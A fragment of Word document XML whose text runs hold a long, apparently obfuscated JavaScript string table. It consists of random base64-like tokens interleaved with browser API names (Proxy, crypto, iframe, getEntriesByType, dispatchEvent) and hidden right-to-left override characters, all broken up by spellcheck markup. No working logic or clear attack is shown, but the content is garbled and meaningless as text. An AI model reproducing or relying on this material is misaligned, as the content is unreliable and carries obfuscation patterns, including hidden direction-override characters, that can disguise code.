-9bH7YiehWIBt3rJ9KPCIf4Ic7rA4DkEloh0FpihVcXpSwk8AgO8xB__FpjDZa7QPKwEkORC1CXL4mrmEyZtO6nOrDR1rCb-OUMce2P-IkGN_TAL_Xj-gza9DHek7e_LAk4KYzmGVe-jtHREtdBAqyOBtUYNN3gpeLDLFrU8FwQ_1-bA66Rgk8tDM7RCWBCowwVAyYwWymNEKE5pG9SuA_-Ih4W-aCcW7CiEQtxaV4b1JT8lZujC_p776vxCS2bYMrvJHz6yK7nDY9xiLfk6CUwXLvsXLvCyd9eGpAe4iiqFPXYu9mNZTh6K8KtpAPbnALVwt5PLgnnUXDqXZ8uf2wGOYgE8Cg_W29xLp4_uLiNpVrOE5tphcTCpzTL3dPqLlitKkF_0Ix4AasyMOFC1HQEh74S8oNAacuZujreSDP4KnEhK0fEo6kWyVbQT3dwSqmrOdcc93_IbxT_p0LmgFibTHXqVAXy4tyM5JtWrU3ehQjKeyDmsMlyovxUV8HdvMWu5vSKNNQ32UCCrlZaGEoFE7OjTG9Et35ldFcUlVS3AUd4kF1icTCk3vkL_szkPgQbbxs2zqogFWIFzEmytFJtSoEUVaBJwH80eLhwTXe15tnVyLxHa6VQCgLboe1spcaAEZCNXYZherTFJTeNLP-Nw86O4P2LXObZXEOi7TKhq9pulDLa6tECWN8BKmVQZ-VjEy5jTu6ScZC8VkECR6H0o8IiJ0QB1wiri_-d7hRAPysrdGk-UwXdHWedwEm7BnfeolFQR7CxVDonThosTqhEQvwm6XxvEgvWBJUlerVgIWpyo3K8uK3aYPZr6aVmkfHu3YD9R8g4_j9D5avBViQQkNJg51e3pEvG0dx28BLKF5RzGDnIu_W-8bPkIz1UMME68eFDJGhmSQLSGm4w10DVNwfgADLwBa6L9VaYtlgtbvvTTEj-TbYqLCdFuD9Pl9WbHLdlCDYL2e6Jddcup53VCddHqJti9VWTSkoSVPqjTouQb8BmVQOJ4h-BKaTyl9K9uYlAz-CHNAP_REUinjMpTRRAbdnfGxQuEvzDLdefSAf6OjzOOv8SdDDr33k74hbqfGy6GGY9LEHC0uvx8eeG3GY65Wbsrb5xzLVecFANRxD1lcPAshwGcWWo9B-t9zwXjJnOZexxrPzR3Z4tL0Yer6oPG7Ki-GKma-PlvMDUPUt8uw8W1e9aHMwIBkKLbmdf-y4Oi7YczmbdIKRJXr2DGDNEbSQuPkrphOyW5mR9DIVIJCBb8JTt6ny0btpkAa39uyTABQhxF</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>nT6dQgtj3_kAfpPFNpo_H-lERljVtG_kOTCKmB6lROD_wtXgctUru_wEQYhNr8Tw43r_ifky3Sz882iU9y6TAPuuCVf1p56fM0nD-g9ntvv1QQb5w-bUBBQpxOtzBLGbA_a032QLRUaJepBtDD1KP89JYc_N17XFxTGjaD_NeF2uorXGY3CAVvzZb7yVNh3vrc_-ssT7pRfeOtwmzJhHGIrvo5GZ8KoKghefXn2uYJ99jxY68puAZgNQ16pyZhh4cR6a7ghuno6_cC33h7W9b35F__X5QVNum3AvxfdeDT3DoiUyXugJtz6MWlkIeZyAvC0PD5mbUuT50w4Nj3MIiCayK-mFJarsjYxvQVf6oqFsXKj2LdqUjYGYQTEvgcAzhfAhJ_muopeA7G4pn26jFqbAMV5coUy0Rz5f2t4uJcRBFsrlVIIpfv9kgSUYxgNeBrzU8aYXv56rHolCIwz0Kf0nZimohPsMp6CvjPLPq1z4C-kjbhepd40Bvq5wKyPddQAcfYnfXW2y7fXmnohTV90fa1N1vfcqlQ6euUs-OJ2d-Q8qb-vPQSdCRlJSPIg9Wf38dWzBenUOMm5rhhRGHs5RSMYoVxhq02IOaN6mnM_7lWxGMMjpZ7eRg-X4_LMOoOkLrqCbW9yGXdk7SSZ0BVR7BVfXKBclRQzVxtOkfvEjQnO1i9fvSxozWtvkFS054Yt8k_7xvN0BZyvCy6_EP5d8wQN29wc2U6GRD_Wn-rVGIRqmhaegdWrHvWL2w2mDUK_LP4bcZpwezKU0R7-svCNHvDaroEgHSedqdhV2M7z3v33a4OmEKwoWvOHwB4XSsGB_W5Rejd02D9GGLEX6k36cKDV1BfVfG6ImHr0iGc3kbaC-VFIjMPVT3M5CtnyKQpCRje9v-mw1Oi1lxCR6ia29ivq1KwOsDfrbtyhKMZS4IGm1lb9P9uk5rZMBdfakwBsiWDiZoMGdJhtHg9R9WittEcMrn6Zd1HSyYhBCSwtVPT5Iqaaio5c_oVc0xMKmHydDAqsBMmhrgIe3rT5lJ3iUtJDsa-hDBHKkmNU_IDBHf8HutQc2MEbKJhHJyAqyruEHlX_tEx4ZsYgQ7DqW6Vt0EJh770gN32phS_XF3zGciqVfESdomxzJPQUyjcbkODRbOj3ujZrJgfb8BYwMyPS8r0rAs7REEKN_dyqhX8xzpQkHcSn-5ec8WMwYxnQ7RjPFcokahSMs", "86Nj5Ta3s1-X", "cn0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nrtt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-xo", "ZagTqByrx1Lylj8", "j9V_xjqBsEvXwhc", "reduce", "98hJjjKUkhiB_GAaQe4", "FvtZmCmEuEj4_SVKTPE", "kd19yQWE_ECOphEpbJv-TjS8", "A609-Q", "Math", "EcI", "No9grwyC-Hw", "QTqEWP5kLboKVKI", "CBebbM1vVqMWRp0", "Om6mD9N8Nqp3", "01S_F50", "LGXcZ7klEfdxcqfZhBZJ57R8RwZI8FnLEYehmklGnmeqqEETUERzfPhzzVanwJ-3R0uiWX8", "DGHjEqQEN8tMS8nn8zsgna8FO256m1qYMqeBvV9s2k_h9GVrKF9uLNMjtiSmlPfCJCGWQB2-YLrQBP7qGg", "s2DOKqJ2LNpSbLjb6Q", "7yaZQ-dKf64NOOOqjzcU9bw1Pxtp3TL1Jw", "b4kxuRzq4Q", "E7g54Veq", "X0m6B9lWcg", "8CbDWbwGDs0PML2m31oTg9l8ChMUmyv6Tg", "myiqL8NKeI8", "sqVK2VmRngo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LEPSOpMJIutz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5eQD7FHy7S0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ryDNGaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "abs", "LlapLcJHVJ4", "b5tYwCKY02yp", "-2\u202EYuuMIdcQn\u202D", "kTTwJIsjFM1BQN3SvV8x3ZEzW2VC9g", "children", "NcYMjG_z7Db-zzBMKNI", "function", "zpE_n1Lj-gbapRI", "O2jeQqpFF_gxLaU", "U8MfsWXI8iWXiAM-Q-XLSzE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QFi-NdhjDg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XtdalXyujU_S_WIeIK-LdRz68Y7vTeZ53w", "8CSDbPptaacjeaL2", "haIY4VnkwjqI5AQzBtKFEkfi", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GVyTGg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6TzFK6c6bfctcqq5yEkPrMlzVxBZ-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>zn_Xcbk2klXu2TNxVlLBgVSUb5J1xP5jM3qQ0r0WC2dBtq1KsHEeqIgHw", "match", "C6Ur43rm3x3Zzlc", "2cB87miNhgI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "E61hywjqlA", "PGDNZ5kZB9x-cd7B3wM", "interactive", "y-5C10uBjhfKlnQ", "qbo51XzQ7g", "min", "-5gc1WfC13uprj5JDbmI", "SapNkz-f726EjWA4HuHZ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "any", "bst0jze6qXak", "detail", "sJxGyV-Jrln7xRZrTIk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TGc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ltltkQ-Hv0XJvUtSfw", "ga003CvjqGvbtxhCRfymCGk", "f_cbvHb23A", "PXKyBN04FpxiMM_k2xVm_Lo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQbKHoYdVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "34teyWz0zAncqDI-R4nPMQ", "-2HzdoQ3Rto", "18h2ggX1hQ", "l3Q", "pEv2LuA", "hidden", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "lc4PomaMvQLRkWl1YabaTQ2V", "Cc9MkDePkCDp-Hsa", "JmGAKOt8HahlOPXc", "51v1cdk4IqtFDcmJvjQ4gLxSfHVt6U6QG9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Y0C4aJ1pDIVwTw", "9wL2cYgyBvghEJOP0W47qP9PKDA", "r-5wg2my_z6q8UkbGa30VDyjoY7DXqo", "CBf9e4QtYdpJVcq8_zEqkdpcM3hi4QjLVLqz90YC5kn48A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dTqqeMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4mOqd-RPOKtLftSjjn4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "RYx31QOB8Vmn2lZ8AeyeL0ut8LqObLl-xFMEB_X5PQ", "Go0q-wuE2g", "2F6XC-5FRK1xObi9mXVTvf0rJwoGhmavct-1wi1k-HzDzy4Pd1MaLsRU42HJ", "BNVs1Fs", "Mwy8QvpJbbRxHA", "NuJm2w-rznLE2FgOBw", "nNt9yxSC9lLJjlQxL7HlSh_HsuzhTvIy93stYrG_E40", "8SKXD_IcSbFu", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9UxxU_H2GfWxwcjdb3oWzyDz-7bRtQL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XlI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "undefined", "13n0cKc6Rg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "catch", "substring", "zMNB_D-0m2z1", "SQHWQ9YcNtkvUYD20A", "sSWXbu91QvQ", "6jOVSIYxaLI0QoT41Q", "3BmUVo0", "DSzWeIIucOoqQtf66ngjt_hcZHc7", "wgS4aOITMI8", "6CDMVI4J", "mFDRVo87P69HdPflwA", "6xH3fpwrDO8tSd7p1TRY3bw", "round", "qjHRb7EhCuouLbmemG4I", "1mbfdvRKW95hVcvTgw","n7cFjhHJ", "bwezb85xX88uNIQ", "aCWAEOE8PKVEZ50", "N12RKORyAJZ8a7w", "Yz_6d58EBuYUMs6H1T5J", "BgPYJ6Y6ZesuEA", "u3bSQL0jY-5bKPit", "A_pC8TPO4Q", "AoYVxSLsgGv5oSEtLtKedXnj-MydDuI8gBIeWNnfWO9tS7HY9q7dkz-Ye8lFHVdg7N8juPJN3Cdg", "Lqxf9AejoG-JszY9Hw", "bubbles", "itNNjzOd5Ejuvi5NB4evcziH88L1D8xi","xIlL9jjTtXPn-nJD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MrFDizWMug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb","string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI", "554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE","S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
